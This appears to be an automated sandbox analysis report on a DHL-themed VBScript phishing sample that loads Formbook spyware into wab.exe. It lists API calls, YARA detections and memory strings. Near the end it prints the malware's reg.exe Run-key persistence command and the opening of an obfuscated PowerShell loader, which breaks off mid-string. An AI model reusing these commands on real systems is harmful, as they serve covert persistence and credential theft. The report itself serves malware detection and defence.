Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401806 NtdllDefWindowProc_W, 16_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004018C0 NtdllDefWindowProc_W, 16_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004016FD NtdllDefWindowProc_A, 19_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004017B7 NtdllDefWindowProc_A, 19_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00402CAC NtdllDefWindowProc_A, 20_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00402D66 NtdllDefWindowProc_A, 20_2_00402D66
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB35C0 NtCreateMutant,LdrInitializeThunk, 25_2_21FB35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2B60 NtClose,LdrInitializeThunk, 25_2_21FB2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 25_2_21FB2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 25_2_21FB2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB3090 NtSetValueKey, 25_2_21FB3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB3010 NtOpenDirectoryObject, 25_2_21FB3010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB4340 NtSetContextThread, 25_2_21FB4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB4650 NtSuspendThread, 25_2_21FB4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB39B0 NtGetContextThread, 25_2_21FB39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2BF0 NtAllocateVirtualMemory, 25_2_21FB2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2BE0 NtQueryValueKey, 25_2_21FB2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2BA0 NtEnumerateValueKey, 25_2_21FB2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2B80 NtQueryInformationFile, 25_2_21FB2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2AF0 NtWriteFile, 25_2_21FB2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2AD0 NtReadFile, 25_2_21FB2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2AB0 NtWaitForSingleObject, 25_2_21FB2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_036E30EF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory, 25_2_036E30EF
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F4CEC6 2_2_00007FF848F4CEC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F4DC72 2_2_00007FF848F4DC72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222F7194 8_2_222F7194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222EB5C1 8_2_222EB5C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_08351520 14_2_08351520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_08351DF0 14_2_08351DF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_083511D8 14_2_083511D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B040 16_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0043610D 16_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00447310 16_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044A490 16_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040755A 16_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0043C560 16_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B610 16_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044D6C0 16_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004476F0 16_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044B870 16_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044081D 16_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00414957 16_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004079EE 16_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00407AEB 16_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044AA80 16_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00412AA9 16_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404B74 16_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404B03 16_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044BBD8 16_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404BE5 16_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00404C76 16_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00415CFE 16_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00416D72 16_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00446D30 16_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00446D8B 16_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00406E8F 16_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00405038 19_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0041208C 19_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004050A9 19_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040511A 19_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043C13A 19_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004051AB 19_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00449300 19_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040D322 19_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A4F0 19_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043A5AB 19_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00413631 19_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00446690 19_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A730 19_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004398D8 19_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004498E0 19_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A886 19_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043DA09 19_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00438D5E 19_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00449ED0 19_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0041FE83 19_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00430F54 19_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004050C2 20_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004014AB 20_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00405133 20_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004051A4 20_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00401246 20_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040CA46 20_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00405235 20_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004032C8 20_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00401689 20_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00402F60 20_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8B1B0 25_2_21F8B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22020274 25_2_22020274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB516C 25_2_21FB516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220212ED 25_2_220212ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F70100 25_2_21F70100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203132D 25_2_2203132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220403E6 25_2_220403E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FC739A 25_2_21FC739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F0CC 25_2_2202F0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220370E9 25_2_220370E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9D2F0 25_2_21F9D2F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201A118 25_2_2201A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B2C0 25_2_21F9B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220381CC 25_2_220381CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80535 25_2_21F80535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220316CC 25_2_220316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F71460 25_2_21F71460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203F7B0 25_2_2203F7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F717EC 25_2_21F717EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203F43F 25_2_2203F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22032446 25_2_22032446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA4750 25_2_21FA4750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9C6E0 25_2_21F9C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22037571 25_2_22037571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22040591 25_2_22040591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22037A46 25_2_22037A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F829A0 25_2_21F829A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F85990 25_2_21F85990
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F96962 25_2_21F96962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F89950 25_2_21F89950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9B950 25_2_21F9B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2201DAAC 25_2_2201DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202DAC6 25_2_2202DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAE8F0 25_2_21FAE8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F838E0 25_2_21F838E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203AB40 25_2_2203AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2203EB89 25_2_2203EB89
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8A840 25_2_21F8A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22036BD7 25_2_22036BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FBDBF9 25_2_21FBDBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202C87C 25_2_2202C87C
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 21F6B970 appears 122 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 21FFF290 appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 21FC7E54 appears 54 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 21FEEA12 appears 54 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: DHL_ES567436735845755676678877988975877.vbs Initial sample: Strings found which are bigger than 50
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
Yara signature match
Source: amsi64_2132.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_2668.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5804.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_6324.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@54/18@7/6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 16_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 20_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 16_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 16_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 16_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Presignal23.Hal Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ey2gvbbt.de4.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2132
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2668
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5804
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6324
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000010.00000002.2534745022.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2531984153.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2531046786.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2525034620.0000000004BC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: DHL_ES567436735845755676678877988975877.vbs ReversingLabs: Detection: 34%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru 